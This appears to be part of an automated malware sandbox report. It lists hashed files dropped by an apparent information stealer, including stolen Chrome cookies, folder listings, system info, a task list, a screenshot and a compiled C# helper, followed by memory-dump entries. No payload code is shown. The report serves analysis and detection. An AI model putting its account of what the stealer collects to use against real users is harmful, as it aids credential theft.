96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\uar3foux\uar3foux.dll

Filesize
4KB

MD5
113df6507a5d31e7f9085f182d28df2b

SHA1
dcb07e3a4379e06dbf99a3d88872c6e1b4ae15cf

SHA256
9f9883589efe7e00c20b5704595a38a9b56dd4bc2bd8c39749238e72bb0b68a2

SHA512
349c88998dfabe567221bc39159e3191ed6437ca0724da7769c5352e5d59676a1f799440455e1c7eee89df6780d7d45bbc4f0191348aa63053274fa805ce3e2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\wiu4W.zip

Filesize
403KB

MD5
f9203df07c799d9a06ec11e4745cf0c7

SHA1
b0c445aa1c1bace5623599639f6bc9c8846dbdce

SHA256
c83dc3b0482eb6a09272e0cc35a4d3ea7c934c31f9a921e1b915b09486ceaa90

SHA512
408ba2fed19431b26107fbaf394ae9c0ed69cddeb7cfd3c95cef6d1d69c9d520bea6fa9fb60beb1cc0076751035b5ac92e1b4c12ca846c90fffa2473da979d08

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Credentials\Chrome\Chrome Cookies.txt

Filesize
258B

MD5
5f54e3e99c69f34c7a9c34f05dad0e67

SHA1
edaa8269d54ec3b703f4cc1c03d0d126df16fa87

SHA256
afa9a1bafa9b505541d750eba31eb679f08ffbf3342477cd149a910dd9953be3

SHA512
0d6fe89f9b9e4c9fe6252a2e2bc2171b298cdf58dfff36c9fbe90f271bfddb0d2d1e124437f4775ba17965965ef506e19a70604e0292a35cbbaca4a5d6d371e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Directories\Desktop.txt

Filesize
690B

MD5
65d8fdeb319e491b288793bf5ff1a2c4

SHA1
ffed31d68a7e13c7181b909568949842638114b6

SHA256
e99cc0d69d9c4d380ba61ee8bf8bf0e0ea132f8974e12330a0001316d49ab825

SHA512
f8a7e712aed1756cd39ecd125063db1a27c1acfd84c801396622039747ef44eb41f5da2483f023e51450edb1404fe97b1508091ddfbcc09ca9030fa7330907a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Directories\Documents.txt

Filesize
808B

MD5
47de71dc5c72173324430960b0a0141f

SHA1
a9ed435956599a3022669cea67139c6dd295b11b

SHA256
1e43d1e307ea3a5e57d56a25fb7f8bb64ecc8b42bf902ed12e1e2ab1dd7dac2b

SHA512
296e77d28ecf1cbb974d72e5ea63c163d171ec735354b809600c771ba689c4467828ff33481a288617b9958e1edcc1a135b7ff98b819aaa360a398e6df0cf867

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Directories\Downloads.txt

Filesize
781B

MD5
0620db1b2f12281ae7478878300d08a0

SHA1
d7e8225a7f9ea571e5547a89147f82deba08f2ca

SHA256
202e4f7f30d20204632eed6313fefc9d34100933fff4200e6abb98baadae6fec

SHA512
ee75df076f02db336dbc5e123c6dcc66f040d0b98b0416d773a2a4bade3f6549adfdccfcc0963cbac384ce2ac2372319efb1eb3d8f14608c46d68b20c329e895

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Directories\Music.txt

Filesize
596B

MD5
4aec3805bd45fb6eebf5cb9bf8fa0de7

SHA1
e882bd1e843d74feac323148e27d44b39e7b52c0

SHA256
ec96380b27980e703109aef7fd330543a6cd2cf36fdc373135a38add21f7c5e9

SHA512
259b3132437539502114327c332d2b6950dd4872debd6665f3c295b5b1b2d774869b5174df0fc3d8aabe5ce115796f56eaea216ead3d2493984405cf3ac07d49

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Directories\Pictures.txt

Filesize
555B

MD5
7a4017b79c83e49b4c894f51583c96e3

SHA1
4703ef95f51418bbfe23127ff5d552ee73dd168f

SHA256
e739fd8c0a47f6e867a8ba894bb0cf2300e0c187ea95e6d050a38ad00bbd4e3c

SHA512
bb843a2254ae6a873327ade11d0b81339e706d5f94743a7e3a927105d8c4645269fdd9c945bd072cfaa83fb38f348eeca24ffd272db5e14bc72a8bd0292312fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Display (1).png

Filesize
399KB

MD5
63bd5be8d873b52833e1c563bbb34fad

SHA1
dfe9fe7b919bc3e58cc38a0c42b7e4a79284d002

SHA256
a332505ee97583cf858dfb73166e26125b1a13f9a5303f295833695743f7a601

SHA512
32bdc382ec6a2d03a84431109a3e687cd770093160c72ffc04fc697d7bb128969f9c51a8edefbcfa8492b2b766e6b85a32fc9e60a460d8064477a568b35e1073

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \System\Antivirus.txt

Filesize
16B

MD5
01daefe4caf17be6854e1a9a0dece70c

SHA1
fee51c1ab6684f18e59f3ffa9c0296ed1e5dbd28

SHA256
2331be85a81c008dedbfef3bfb0d68ef76ac6bee37cf9e653591790a21dbbf32

SHA512
aa934777ecb3097cd820eded81c9c7baf68039a7e448cec067317565427212882301ba517adfb5f63a6677e7d80baf15837f05dc8c9a9d2bd80f3ca65234ed16

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \System\MAC Addresses.txt

Filesize
232B

MD5
c8469a4a1ab7d3e4ac87a0b084a4446f

SHA1
20712d8e842064c56acfd4ecb337a0ff171c32c9

SHA256
f80a2c90474f79cdd752f8f8039b7f345c121771305bcf870d2ee72c71197d57

SHA512
7947bb89ace6736069580a774516252c570d426a0b8eb0b4a7d615d358f8dbf85a1c2abbbaaca22982a5709577982fed7a56313ccabb09ac11dbdab3dd793374

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \System\System Info.txt

Filesize
2KB

MD5
b17b7ebc19c33bc7baddbbd73ba03961

SHA1
4e96f265d7fe1f7caed8cb2dd4511db5b37c5d48

SHA256
6d7df7d0c33d4cafada5b8d3e1fbfaad72234b4e26239e09046a1870b41adabb

SHA512
55f46fa8af847e4f8d4827b8def4062f30e65c8e0d5e37a5da993ce0834f66200fd1b61327f520078072bb82ce9cfc0ed1bf1906f0f5c6be43d158b92af48ec0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \System\Task List.txt

Filesize
13KB

MD5
1e7ae7c76c690656fe9856f5196acd5f

SHA1
e7fd774276abf3cb933e277c3dc2b4fbddf45f8e

SHA256
883d9dc81b6abab21d799190422d90607ad2ce5a239f1cab97069b8ff0d1dc19

SHA512
372f8e052fd18037641b61ea10186a328ac7a80d9699327d202f3c171425c34eeeccc5f409a044d4fc22b1c1e08c1f028faf09c29c6839b7c1490963595621ab

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uar3foux\CSC838EF53157A44C6E9088F58F3B7296A8.TMP

Filesize
652B

MD5
7b9740711aa5768bcf04e83e9fc48ce0

SHA1
7de10fb06f01399560366f92b5130fa983c02f36

SHA256
75904509e43bfa58450436b897f72fa19eea0c83d437fccf332d611eacd77a21

SHA512
2e27e9b2aa23bdfee5163169851625521cc8461d3a9b2af4aa7e66955cabe53e0de20d865641ab70bd4556776b3a7e0fd89e64e8c2c89ebbf2cce08e384bdcb2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uar3foux\uar3foux.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uar3foux\uar3foux.cmdline

Filesize
607B

MD5
cea2011ed7d99fbd4df4efb758e67600

SHA1
83f6f20a010b013f3b1d9b92222ca70d2fe70107

SHA256
f45864eee6f95525d11d0e4189d4e5d65b5731418641ee7b2c70119d9bbb837b

SHA512
d9e1c818817b054b1450fd6e02016fb7ce0cb2a00d3afd9a0f41702794a7de1cee8975f3fd132f23331531fa9240e43cd1006a4f3c60e260e072a2bb0fe03ed3

Download Submit
memory/1792-86-0x00007FFD28293000-0x00007FFD28295000-memory.dmp

Filesize
8KB

Download
memory/1792-109-0x00007FFD28290000-0x00007FFD28D52000-memory.dmp

Filesize
10.8MB

Download
memory/1792-98-0x00007FFD28290000-0x00007FFD28D52000-memory.dmp

Filesize
10.8MB

Download
memory/1792-88-0x0000018741000000-0x0000018741022000-memory.dmp

Filesize
136KB

Download
memory/1792-197-0x00007FFD28290000-0x00007FFD28D52000-memory.dmp

Filesize
10.8MB

Download
memory/2148-56-0x00007FFD39D00000-0x00007FFD39D19000-memory.dmp

Filesize
100KB

Download
memory/2148-54-0x00007FFD38550000-0x00007FFD3857D000-memory.dmp

Filesize
180KB

Download
memory/2148-140-0x00007FFD292B0000-0x00007FFD29368000-memory.dmp

Filesize
736KB

Download
memory/2148-120-0x00007FFD3AEA0000-0x00007FFD3AEAD000-memory.dmp

Filesize
52KB

Download
memory/2148-110-0x00007FFD387D0000-0x00007FFD387E9000-memory.dmp

Filesize
100KB

Download
memory/2148-87-0x00007FFD299E0000-0x00007FFD29B51000-memory.dmp

Filesize
1.4MB

Download
memory/2148-25-0x00007FFD29B60000-0x00007FFD29FCE000-memory.dmp

Filesize
4.4MB

Download
memory/2148-85-0x00007FFD387F0000-0x00007FFD3880F000-memory.dmp

Filesize
124KB

Download
memory/2148-78-0x00007FFD38550000-0x00007FFD3857D000-memory.dmp

Filesize
180KB

Download
memory/2148-185-0x00007FFD28F30000-0x00007FFD292A5000-memory.dmp

Filesize
3.5MB

Download
memory/2148-83-0x00007FFD39D00000-0x00007FFD39D19000-memory.dmp

Filesize
100KB

Download
memory/2148-84-0x00007FFD28E10000-0x00007FFD28F28000-memory.dmp

Filesize
1.1MB

Download
memory/2148-79-0x00007FFD3A070000-0x00007FFD3A07D000-memory.dmp

Filesize
52KB

Download
memory/2148-199-0x00000200A3450000-0x00000200A37C5000-memory.dmp

Filesize
3.5MB

Download
memory/2148-76-0x00007FFD38780000-0x00007FFD38794000-memory.dmp

Filesize
80KB

Download
memory/2148-71-0x00007FFD292B0000-0x00007FFD29368000-memory.dmp

Filesize
736KB

Download
memory/2148-72-0x00007FFD28F30000-0x00007FFD292A5000-memory.dmp

Filesize
3.5MB

Download
memory/2148-74-0x00000200A3450000-0x00000200A37C5000-memory.dmp

Filesize
3.5MB

Download
memory/2148-73-0x00007FFD3AEB0000-0x00007FFD3AED4000-memory.dmp

Filesize
144KB

Download
memory/2148-68-0x00007FFD29B60000-0x00007FFD29FCE000-memory.dmp

Filesize
4.4MB

Download
memory/2148-66-0x00007FFD387A0000-0x00007FFD387CE000-memory.dmp

Filesize
184KB

Download
memory/2148-64-0x00007FFD3AEA0000-0x00007FFD3AEAD000-memory.dmp

Filesize
52KB

Download
memory/2148-62-0x00007FFD387D0000-0x00007FFD387E9000-memory.dmp

Filesize
100KB

Download
memory/2148-60-0x00007FFD299E0000-0x00007FFD29B51000-memory.dmp

Filesize
1.4MB

Download
memory/2148-58-0x00007FFD387F0000-0x00007FFD3880F000-memory.dmp

Filesize
124KB

Download
memory/2148-139-0x00007FFD387A0000-0x00007FFD387CE000-memory.dmp

Filesize
184KB

Download
memory/2148-48-0x00007FFD40460000-0x00007FFD4046F000-memory.dmp

Filesize
60KB

Download
memory/2148-217-0x00007FFD28E10000-0x00007FFD28F28000-memory.dmp

Filesize
1.1MB

Download
memory/2148-30-0x00007FFD3AEB0000-0x00007FFD3AED4000-memory.dmp

Filesize
144KB

Download
memory/2148-236-0x00007FFD299E0000-0x00007FFD29B51000-memory.dmp

Filesize
1.4MB

Download
memory/2148-235-0x00007FFD387F0000-0x00007FFD3880F000-memory.dmp

Filesize
124KB

Download
memory/2148-231-0x00007FFD3AEB0000-0x00007FFD3AED4000-memory.dmp

Filesize
144KB

Download
memory/2148-230-0x00007FFD29B60000-0x00007FFD29FCE000-memory.dmp

Filesize
4.4MB

Download
memory/2148-265-0x00007FFD387F0000-0x00007FFD3880F000-memory.dmp

Filesize
124KB

Download
memory/2148-273-0x00007FFD28E10000-0x00007FFD28F28000-memory.dmp

Filesize
1.1MB

Download
memory/2148-272-0x00007FFD3A070000-0x00007FFD3A07D000-memory.dmp

Filesize
52KB

Download
memory/2148-271-0x00007FFD38780000-0x00007FFD38794000-memory.dmp

Filesize
80KB

Download
memory/2148-270-0x00007FFD28F30000-0x00007FFD292A5000-memory.dmp

Filesize
3.5MB

Download
memory/2148-269-0x00007FFD387A0000-0x00007FFD387CE000-memory.dmp

Filesize
184KB

Download
memory/2148-268-0x00007FFD3AEA0000-0x00007FFD3AEAD000-memory.dmp

Filesize
52KB

Download
memory/2148-267-0x00007FFD387D0000-0x00007FFD387E9000-memory.dmp

Filesize
100KB

Download
memory/2148-266-0x00007FFD299E0000-0x00007FFD29B51000-memory.dmp

Filesize
1.4MB

Download
memory/2148-264-0x00007FFD39D00000-0x00007FFD39D19000-memory.dmp

Filesize
100KB

Download
memory/2148-263-0x00007FFD38550000-0x00007FFD3857D000-memory.dmp

Filesize
180KB

Download
memory/2148-262-0x00007FFD40460000-0x00007FFD4046F000-memory.dmp

Filesize
60KB

Download
memory/2148-261-0x00007FFD3AEB0000-0x00007FFD3AED4000-memory.dmp

Filesize
144KB

Download
memory/2148-260-0x00007FFD29B60000-0x00007FFD29FCE000-memory.dmp

Filesize
4.4MB

Download
memory/2148-255-0x00007FFD292B0000-0x00007FFD29368000-memory.dmp

Filesize
736KB

Download
memory/2672-181-0x00000223A2680000-0x00000223A2688000-memory.dmp

Filesize
32KB

Download